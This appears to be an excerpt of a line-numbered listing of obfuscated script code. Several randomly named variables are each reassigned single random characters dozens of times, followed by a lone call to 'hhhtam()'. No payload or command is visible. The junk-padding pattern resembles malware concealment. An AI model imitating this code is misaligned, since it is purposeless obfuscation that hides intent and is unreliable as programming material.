346 | gzgek = "N"; | |
347 | gzgek = "X"; | |
348 | gzgek = "l"; | |
349 | gzgek = "G"; | |
350 | gzgek = "n"; | |
351 | gzgek = "r"; | |
352 | phibypc = "W"; | |
353 | phibypc = "q"; | |
354 | phibypc = "S"; | |
355 | phibypc = "M"; | |
356 | phibypc = "x"; | |
357 | phibypc = "f"; | |
358 | phibypc = "f"; | |
359 | phibypc = "m"; | |
360 | phibypc = "M"; | |
361 | phibypc = "x"; | |
362 | phibypc = "F"; | |
363 | phibypc = "A"; | |
364 | phibypc = "Q"; | |
365 | phibypc = "A"; | |
366 | phibypc = "K"; | |
367 | phibypc = "T"; | |
368 | phibypc = "A"; | |
369 | phibypc = "t"; | |
370 | phibypc = "J"; | |
371 | phibypc = "n"; | |
372 | phibypc = "d"; | |
373 | phibypc = "o"; | |
374 | phibypc = "M"; | |
375 | phibypc = "B"; | |
376 | phibypc = "a"; | |
377 | phibypc = "Y"; | |
378 | phibypc = "p"; | |
379 | phibypc = "f"; | |
380 | phibypc = "Q"; | |
381 | phibypc = "n"; | |
382 | phibypc = "C"; | |
383 | phibypc = "z"; | |
384 | phibypc = "Z"; | |
385 | phibypc = "p"; | |
386 | phibypc = "0"; | |
387 | znfaypwcz = "K"; | |
388 | znfaypwcz = "M"; | |
389 | znfaypwcz = "H"; | |
390 | znfaypwcz = "P"; | |
391 | znfaypwcz = "K"; | |
392 | znfaypwcz = "l"; | |
393 | znfaypwcz = "E"; | |
394 | znfaypwcz = "a"; | |
395 | znfaypwcz = "r"; | |
396 | znfaypwcz = "L"; | |
397 | znfaypwcz = "W"; | |
398 | znfaypwcz = "c"; | |
399 | znfaypwcz = "T"; | |
400 | znfaypwcz = "h"; | |
401 | znfaypwcz = "r"; | |
402 | znfaypwcz = "F"; | |
403 | znfaypwcz = "I"; | |
404 | znfaypwcz = "a"; | |
405 | znfaypwcz = "t"; | |
406 | znfaypwcz = "O"; | |
407 | znfaypwcz = "d"; | |
408 | znfaypwcz = "u"; | |
409 | znfaypwcz = "r"; | |
410 | znfaypwcz = "O"; | |
411 | znfaypwcz = "S"; | |
412 | znfaypwcz = "s"; | |
413 | znfaypwcz = "V"; | |
414 | znfaypwcz = "p"; | |
415 | znfaypwcz = "g"; | |
416 | znfaypwcz = "t"; | |
417 | pjybzdo = "J"; | |
418 | pjybzdo = "l"; | |
419 | pjybzdo = "i"; | |
420 | pjybzdo = "F"; | |
421 | pjybzdo = "N"; | |
422 | pjybzdo = "E"; | |
423 | pjybzdo = "C"; | |
424 | pjybzdo = "u"; | |
425 | pjybzdo = "n"; | |
426 | pjybzdo = "V"; | |
427 | pjybzdo = "C"; | |
428 | pjybzdo = "Z"; | |
429 | pjybzdo = "i"; | |
430 | pjybzdo = "V"; | |
431 | pjybzdo = "A"; | |
432 | pjybzdo = "d"; | |
433 | pjybzdo = "c"; | |
434 | pjybzdo = "e"; | |
435 | pjybzdo = "T"; | |
436 | pjybzdo = "A"; | |
1397 | hhhtam ( ); |
|